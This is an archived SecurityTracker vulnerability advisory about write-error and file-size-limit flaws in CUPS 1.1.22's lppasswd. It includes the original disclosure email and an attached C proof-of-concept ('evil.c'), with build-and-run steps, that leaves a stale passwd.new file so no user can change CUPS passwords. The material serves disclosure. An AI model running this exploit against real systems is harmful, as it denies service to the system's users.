SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   CUPS Vendors:   Easy Software Products
CUPS lppasswd Lets Local Users Truncate Files and Deny Service
SecurityTracker Alert ID:  1012602
SecurityTracker URL:  http://securitytracker.com/id/1012602
CVE Reference:   CAN-2004-1268, CAN-2004-1269, CAN-2004-1270   (Links to External Site)
Updated:  Dec 23 2004
Original Entry Date:  Dec 16 2004
Impact:   Denial of service via local system, Modification of system information
Exploit Included:  Yes  
Version(s): 1.1.22
Description:   A vulnerability was reported in the CUPS lppasswd utility. A local user can truncate or modify certain files and cause denial of service conditions on the target system.

D. J. Bernstein reported that there are flaws in the way that lppasswd edits the '/usr/local/etc/cups/passwd' file.

It is reported that lppasswd ignores certain write errors, so a local user can fill up the available disk space at a certain time to cause the password file to be truncated [CVE: CAN-2004-1268].

It is also reported that if lppasswd hits a file-size resource limit while writing to 'passwd.new', the file will not be removed and subsequent attempts to invoke lppasswd will fail [CVE: [CVE: CAN-2004-1269].

It is also reported that an error in 'lppasswd.c' cause an error message to be printed to stderr without exiting afterwords. On certain systems, user-specified data may be writted to the passwd file [CVE: [CVE: CAN-2004-1270].

Bartlomiej Sieka is credited with discovering these flaws.
Impact:   A local user can truncate or modify certain files on the target system.

A local user can disable lppasswd.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.cups.org/ (Links to External Site)
Cause:   Exception handling error, State error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 13 2005 (Red Hat Issues Fix) CUPS lppasswd Lets Local Users Truncate Files and Deny Service   (bugzilla@redhat.com)
Red Hat has released a fix.
Jan 18 2005 (Mandrake Issues Fix) CUPS lppasswd Lets Local Users Truncate Files and Deny Service   (Mandrake Linux Security Team <security@linux-mandrake.com>)
Mandrake has released a fix.


 Source Message Contents
Date:  15 Dec 2004 08:30:45 -0000
Subject:  [local] [kill] CUPS 1.1.22 lppasswd ignores write errors, etc.



--6c2NcOVqGQ03X4Wi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Bartlomiej Sieka, a student in my Fall 2004 UNIX Security Holes course,
has discovered several security problems in how lppasswd, version 1.1.22
(current), edits /usr/local/etc/cups/passwd. I'm publishing this notice,
but all the discovery credits should be assigned to Sieka.

First, lppasswd blithely ignores write errors in fputs(line,outfile) at
lines 311 and 315 of lppasswd.c, and in fprintf(...) at line 346. An
attacker who fills up the disk at the right moment can arrange for
/usr/local/etc/cups/passwd to be truncated.

Second, if lppasswd bumps into a file-size resource limit while writing
passwd.new, it leaves passwd.new in place, disabling all subsequent
invocations of lppasswd. Any local user can thus disable lppasswd by
running the attached program 63.c.

Third, line 306 of lppasswd.c prints an error message to stderr but
does not exit. This is not a problem on systems that ensure that file
descriptors 0, 1, and 2 are open for setuid programs, but it is a
problem on other systems; lppasswd does not check that passwd.new is
different from stderr, so it ends up writing a user-controlled error
message to passwd if the user closes file descriptor 2.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago

--6c2NcOVqGQ03X4Wi
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="63.c"

/*
 * evil.c
 * 2004.12.11
 * Bartlomiej Sieka
 *
 * This program executes the lpasswd(1) password changing utility
 * in way that prevents its further use, i.e. after this program
 * has been executed, all users on the system will be unable to change
 * their CUPS passwords. This is not a documented feature of lppasswd(1)
 * and is certainly unauthorized.
 *
 * This program has been tested with lppasswd(1) versions 1.1.19 and
 * 1.1.22 on FreeBSD 5.2.
 *
 * The recipe:
 * gcc -o evil evil.c
 * ./evil
 * Type in passwords as requested, and voila! This will create an empty
 * file /usr/local/etc/cups/passwd.new. The existence of this file makes
 * lppasswd(1) quit before changing users password with message
 * "lppasswd: Password file busy!".
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
extern char **environ;

int main(int argc, char **argv){

  char *cmd = "/usr/local/bin/lppasswd";
  char *args[] = { "/usr/local/bin/lppasswd", 0x00 };

  /* set the file size limit to 0 */
  struct rlimit rl;
  rl.rlim_cur = 0;
  rl.rlim_max = 0;
  setrlimit(RLIMIT_FSIZE, &rl);

  /* execute the poor victim */
  execve(cmd, args, environ);
}

--6c2NcOVqGQ03X4Wi--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC